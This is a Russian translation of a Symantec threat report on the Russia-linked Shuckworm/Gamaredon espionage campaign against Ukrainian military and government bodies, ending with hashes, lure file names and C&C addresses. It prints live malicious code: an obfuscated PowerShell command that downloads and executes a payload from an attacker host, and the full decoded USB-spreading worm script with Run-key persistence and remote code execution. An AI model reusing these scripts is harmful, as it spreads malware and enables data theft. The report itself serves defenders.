Shuckworm: Неустанная российская киберкампания против Украины

Злоумышленники сосредоточились на получении военной информации и данных о безопасности для поддержки сил вторжения.

Шпионская группа Shuckworm продолжает совершать многочисленные кибератаки на Украину, среди последних целей – спецслужбы, военные и правительственные организации.

В некоторых случаях Shuckworm удавалось организовать длительные вторжения, продолжавшиеся до трех месяцев. Злоумышленники неоднократно пытались получить доступ и похитить конфиденциальную информацию, такую как сообщения о гибели украинских военнослужащих, о боевых действиях и авиаударах противника, о запасах вооружения, о военной подготовке и т.д.

Стремясь опередить обнаружение, Shuckworm неоднократно обновлял свой инструментарий, выпуская новые версии известных инструментов и недолговечной инфраструктуры, а также новые дополнения, такие как вредоносное ПО для распространения по USB.

Shuckworm (она же Gamaredon, Armageddon) – связанная с Россией группировка, которая с момента своего появления в 2014 году практически полностью сосредоточила свою деятельность на Украине. Украинские официальные лица публично заявляют, что группировка действует от имени Федеральной службы безопасности (ФСБ) России.

Тактика, приемы и процедуры работы с вирусом Shuckworm

Известно, что для получения доступа к компьютерам жертв и распространения вредоносного ПО Shuckworm использует фишинговые письма в качестве начального вектора заражения. Злоумышленники рассылают украинским жертвам электронные письма с вредоносными вложениями, причем вложения представляют собой файлы различных типов, таких как:

• .docx
• .rar (RAR archive files)
• .sfx (self-extracting archives)
• .lnk
• .hta (HTML smuggling files)

Наблюдаемые Symantec заманивания жертв касались, в частности, вооруженных конфликтов, уголовного судопроизводства, борьбы с преступностью, защиты детей и т.д.

После заражения жертв злоумышленники загружали на компьютеры дополнительные бэкдоры и инструменты.

Также было замечено, что Shuckworm использует новый сценарий PowerShell для распространения своего собственного вредоносного бэкдора Pterodo через USB. Исследователи компании Symantec, входящей в состав Broadcom, в апреле 2022 года опубликовали в своем блоге статью о Backdoor.Pterodo, в которой описали четыре варианта бэкдора со схожей функциональностью. Эти варианты представляют собой дропперы Visual Basic Script (VBS), которые загружают файл VBScript, используют запланированные задачи (shtasks.exe) для поддержания постоянства и загружают дополнительный код с командно-контрольного сервера (C&C).

В качестве примера последних запланированных задач можно привести выполнение следующих командных строк:

• CSIDL_SYSTEM\wscript.exe «CSIDL_PROFILE\appdata\local\temp\desert» //e:vbscript //b /dmc /j2k /spl /nff
• CSIDL_SYSTEM\wscript.exe «CSIDL_PROFILE\favorites\jumper.asf» //e:vbscript //b /asf /mdf /nab /apk
• wscript.exe «C:\Users\[REDACTED]\Contacts\delightful.abk» //e:vbscript //b /cfg /mdm /cfm /mp4

Новый сценарий PowerShell сначала копирует себя на зараженную машину и создает файл быстрого доступа с расширением rtk.lnk. Сценарий использует такие имена файлов, как «porn_video.rtf.lnk», «do_not_delete.rtf.lnk» и «evidence.rtf.lnk», пытаясь заманить пользователя открыть эти файлы. Имена этих файлов, как правило, написаны на украинском языке, но некоторые из них также на английском.

Далее скрипт осуществляет перечисление всех дисков, копируя себя на все доступные съемные диски – USB-накопители. Эти USB-накопители, скорее всего, используются злоумышленниками для латерального перемещения по сетям жертв и могут быть использованы для доступа злоумышленников к машинам с воздушной защитой в организациях-жертвах.

В ходе этой недавней деятельности Symantec также наблюдали, как группа использовала легитимные сервисы в качестве C&C-серверов, в том числе использовала сервис обмена сообщениями Telegram для своей C&C-инфраструктуры. В последнее время для хранения адресов C&C также используется платформа микроблогов Telegram под названием Telegraph.

.

Рисунок 1. Угрожающие субъекты используют Telegraph для хранения адресов C&C

Shuckworm, как правило, использует свою C&C-инфраструктуру только в течение коротких периодов времени, что ограничивает полезность его C&C при поиске дополнительных активностей или связывании активностей воедино. Однако группа использует SSL-сертификаты, которые имеют некоторые общие черты, что может быть использовано в целях отслеживания. Symantec полагает, что группа, скорее всего, использует для развертывания C&C заранее сконфигурированные образы. Эти данные могут помочь исследователям выявить дополнительную C&C-инфраструктуру и активность Shuckworm.

Symantec также установила, что, скорее всего, Giddome, инструмент для похищения информации, представляющий собой известный бэкдор Shuckworm, был развернут в сетях жертв для кражи и утечки интересующих их данных.

Типичная цепочка атак

Ниже описана типичная цепочка атак, наблюдаемая на компьютере жертвы, зараженном червем Shuckworm в ходе этой кампании.

В одной из атак первым признаком вредоносной активности стало открытие пользователем архивного файла RAR, который, вероятно, был доставлен с помощью фишингового письма и содержал вредоносный документ.

После открытия документа наблюдалось выполнение вредоносной команды PowerShell для загрузки полезной нагрузки следующего этапа с C&C-сервера злоумышленников:

«CSIDL_SYSTEM\cmd.exe» /c start /min «» powershell -w hidden «$gt=’/get.’+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr=’htt’+’ps://’+$addr+$gt;$text=$client.downloadstring($faddr);iex $text»

Недавно компания Symantec заметила, что Shuckworm использует больше IP-адресов в своих сценариях PowerShell. Вероятно, это попытка обойти некоторые методы отслеживания, применяемые исследователями.

Кроме того, Shuckworm продолжает обновлять методы обфускации, используемые в своих сценариях PowerShell, пытаясь избежать обнаружения: в период с января по апрель 2023 года ежемесячно наблюдалось до 25 новых вариантов сценариев этой группы.

Далее был выполнен VBS-скрипт, представляющий собой бэкдор Pterodo от Shuckworm:

• CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model

После этого Symantec увидели, что выполняются несколько похожих скриптов. На машине, использовавшейся для этих действий, как оказалось, хранилось множество конфиденциальных документов, связанных с украинскими спецслужбами или государственными ведомствами.

На другой машине мы наблюдали вредоносную активность, которая, судя по всему, выполнялась из файла (foto.safe), сброшенного с зараженного USB-носителя, подключенного к системе. Symantec обнаружила на зараженных машинах несколько путей к файлам, указывающих на то, что пользователь подключил зараженный USB-носитель, например, «usb-накопитель» переводится как «usb-drive».

Файл foto.safe представляет собой Base64-кодированный скрипт.

В расшифрованном виде он выглядит следующим образом:

fUNCtIon sET-lnK ($chILd) {

$nAMetxt = «foto.sAfe».TolowER();

$NAmE = («кОМПРОМат», «КОРЗиНА», «СеКРетнО» | GeT-rAnDOm).ToUPPeR();

$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;

$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +»\$nAMe.LNK»);

$shoRtCuT.iConloCaTiON = «C:\wiNDoWS\SysteM32\SHELL32.DLL,3»;

$SHOrTcUT.TArGetpAth = «c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE».ToLoweR();

$text = «-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt | OUT-STrIng))».TOlower();

$sHORTCUT.ArGUMEnTs = $tExt;

$sHortCUT.saVE();

$mYfIlE= $chIlD+»\$naMeTXT»

cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE

$FIlE=GEt-ITEM $mYfiLE -forCe

$FiLe.ATtRiButes=’hiDDEN’

}

Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir’\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE’;

coPy-item .\»fOtO.safe» -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp

WHile($CoUNT -lE 2){

$urLs = ‘hTTP://’+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+’.cOriDAS.Ru’) +’/slEEP.Php’;

iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),»)

$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer «drIvETYPe=’2′»;

$Drive.naMe | FOreaCH-oBJecT{

$CHiLdS = GET-ChilDITem $drivE.nAMe

foReach($cHilDs IN $chiLDs)

{

if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )

{

sET-lnk $chILds.fUlLName

}}

IF(($dRIVe.CapaCITY — $DriVe.fREeSPACE) -Gt 1000000){

SEt-lNK $DRivE.name

}}

STArt-SLEeP -S 300;

}

Этот сценарий PowerShell используется для копирования себя на зараженную машину и последующего создания файла ярлыка, который ссылается на сценарий PowerShell. Symantec выявила несколько вариантов этого сценария, которые могут использоваться для индикации успешного заражения или для загрузки дополнительных инструментов на зараженные машины.

Жертвы

Одной из наиболее значимых целей этой кампании являются украинские военные, силовые, исследовательские и правительственные организации. Злоумышленники сосредоточили свое внимание на машинах, содержащих, судя по названиям файлов, секретную военную информацию, которая может быть использована для поддержки российских кинетических военных действий.

Большинство этих атак началось в феврале-марте 2023 года, причем на некоторых машинах-жертвах злоумышленники сохраняли свое присутствие вплоть до мая. Сектор и характер организаций и компьютеров, ставших объектом атаки, могли дать злоумышленникам доступ к значительным объемам конфиденциальной информации. В некоторых организациях имелись признаки того, что злоумышленники находились на машинах отделов кадров этих организаций, что свидетельствовало о том, что для злоумышленников приоритетной была, в частности, информация о лицах, работающих в различных организациях.

Эта активность свидетельствует о том, что Shuckworm продолжает упорно атаковать Украину. Очевидно, что атакующие группы, поддерживаемые российским государством, продолжают уделять приоритетное внимание важным украинским целям, пытаясь найти данные, которые могут помочь в их военных операциях.

Защита/Смягчение

Последние обновления средств защиты можно найти в бюллетене Symantec Protection Bulletin.

Индикаторы компрометации
Вредоносные документы

• f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192
• 31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b
• c62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30
• c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8
• 3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137
• 3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601
• acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8

USB propagation scripts

• 28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01
• 2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581
• dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87
• a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5
• 91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86

Example of LNK files created

• 7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a

LNK file names

• account.rtf.lnk
• account_card.rtf.lnk
• application.rtf.lnk
• bank_accоunt.rtf.lnk
• blank_cap.rtf.lnk
• business trip.rtf.lnk
• compromising_evidence.rtf.lnk
• conduct.rtf.lnk
• cuprovod.rtf.lnk
• do_not_delete.rtf.lnk
• dsk.rtf.lnk
• encouragement.rtf.lnk
• form_new.rtf.lnk
• instructions.rtf.lnk
• journey.mdb
• letter to.rtf.lnk
• login_password.docx.lnk
• login_password.rtf.lnk
• mobilization.rtf.lnk
• my_documents.rtf.lnk
• my_photos.rtf.lnk
• not_delete.rtf.lnk
• on_account.rtf.lnk
• order.rtf.lnk
• petition.rtf.lnk
• porn_video.rtf.lnk
• pornography.rtf.lnk
• pornophoto.rtf.lnk
• proceedings.rtf.lnk
• project_sheet.rtf.lnk
• report.docx.lnk
• report.rtf.lnk
• report_note.rtf.lnk
• request.rtf.lnk
• resolution.rtf.lnk
• secret.rtf.lnk
• secretly.rtf.lnk
• service.docx.lnk
• service.rtf.lnk
• sources.rtf.lnk
• support.rtf.lnk
• weapons_list.rtf.lnk

Recent C&C infrastructure (2023)

• 45.76.141[.]166
• 159.223.112[.]245
• 140.82.56[.]186
• 159.203.164[.]194
• 45.32.94[.]58
• 45.95.232[.]33
• 139.59.109[.]100
• 164.92.245[.]246
• 45.32.101[.]6
• 140.82.18[.]48
• 216.128.140[.]45
• 146.190.127[.]238
• 207.148.74[.]68
• 195.133.88[.]19
• 146.190.60[.]230
• 84.32.190[.]137
• 206.189.154[.]168
• 188.166.4[.]128
• 104.248.54[.]250
• 165.227.76[.]84
• 66.42.104[.]158
• 161.35.95[.]47
• 149.28.125[.]56
• 143.198.50[.]118
• 66.42.126[.]121
• 64.227.72[.]210
• 81.19.140[.]147
• 165.232.77[.]197
• 146.190.117[.]209
• 134.122.51[.]47
• 143.198.152[.]232
• 140.82.47[.]181
• 159.223.102[.]109
• 170.64.188[.]146
• 155.138.194[.]244
• 45.32.88[.]90
• 89.185.84[.]32
• 64.226.84[.]229
• 206.189.14[.]94
• 24.199.84[.]132
• 45.32.41[.]115
• 84.32.188[.]69
• 206.189.128[.]172
• 170.64.168[.]228
• 161.35.238[.]148
• 170.64.138[.]138
• 178.128.86[.]43
• 206.81.28[.]5
• 178.128.231[.]180
• 45.77.115[.]67
• 136.244.65[.]253
• 143.244.190[.]199
• 159.65.176[.]121
• 192.248.154[.]154
• 209.97.175[.]128
• 147.182.240[.]58
• 146.190.212[.]239
• 143.198.135[.]132
• 45.76.202[.]102
• 142.93.108[.]1
• 46.101.127[.]147
• 134.209.0[.]136
• 138.68.110[.]19
• 167.99.215[.]50
• 161.35.232[.]118
• 88.216.210[.]3
• 165.227.121[.]87
• 165.227.48[.]59
• 108.61.211[.]250
• 89.185.84[.]48
• 167.172.69[.]123
• 89.185.84[.]50
• 206.189.0[.]134
• 68.183.200[.]0
• 178.128.16[.]170
• 95.179.144[.]161
• 164.92.222[.]8
• 45.95.233[.]80
• 78.141.239[.]24
• 149.28.181[.]232
• 24.199.107[.]218
• 45.32.184[.]140
• 167.172.20[.]159
• 84.32.190[.]31
• 164.92.185[.]60
• 84.32.131[.]38
• 137.184.178[.]46
• 206.189.149[.]103
• 157.245.176[.]123
• 45.95.232[.]92
• 45.95.232[.]29
• 170.64.150[.]90
• 89.185.84[.]45
• 140.82.16[.]120
• 84.32.185[.]136
• 134.122.43[.]175
• 195.133.88[.]55
• 84.32.191[.]147
• 78.141.238[.]136
• 45.82.13[.]84
• 159.65.248[.]0
• 84.32.34[.]69
• 170.64.146[.]194
• 45.82.13[.]22
• 45.82.13[.]23
• 134.209.33[.]42
• 199.247.8[.]115
• 84.32.128[.]239
• 173.199.70[.]238
• 138.68.174[.]177
• 178.128.213[.]177
• 143.110.180[.]68
• 167.172.144[.]127
• 165.232.165[.]42
• 45.95.232[.]51
• 149.28.98[.]149
• 104.156.230[.]193
• 104.248.86[.]158
• 134.122.51[.]47
• 134.209.182[.]221
• 139.59.60[.]191
• 140.82.11[.]60
• 140.82.47[.]181
• 140.82.50[.]37
• 143.198.135[.]132
• 143.198.53[.]203
• 147.182.250[.]33
• 149.28.130[.]189
• 149.28.181[.]232
• 149.28.98[.]149
• 155.138.194[.]244
• 157.245.69[.]118
• 158.247.204[.]242
• 159.223.102[.]109
• 159.223.23[.]23
• 164.92.72[.]212
• 165.22.72[.]74
• 165.227.76[.]84
• 165.232.120[.]169
• 167.172.58[.]96
• 167.71.67[.]58
• 170.64.136[.]186
• 170.64.140[.]214
• 170.64.156[.]98
• 178.128.228[.]252
• 188.166.176[.]39
• 188.166.7[.]140
• 193.149.176[.]26
• 195.133.88[.]55
• 202.182.116[.]135
• 202.182.98[.]100
• 206.189.80[.]216
• 207.148.72[.]173
• 31.129.22[.]46
• 31.129.22[.]48
• 31.129.22[.]50
• 45.32.101[.]6
• 45.32.117[.]62
• 45.32.158[.]96
• 45.32.62[.]100
• 45.32.88[.]90
• 45.82.13[.]84
• 45.95.232[.]33
• 45.95.232[.]74
• 45.95.233[.]80
• 5.199.161[.]29
• 64.226.84[.]229
• 64.227.64[.]163
• 66.42.104[.]158
• 68.183.200[.]0
• 78.141.239[.]24
• 78.153.139[.]7
• 81.19.140[.]147
• 84.32.131[.]47
• 84.32.188[.]13
• 95.179.144[.]161
• 95.179.245[.]185
• 216.128.178[.]248

Источник: Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine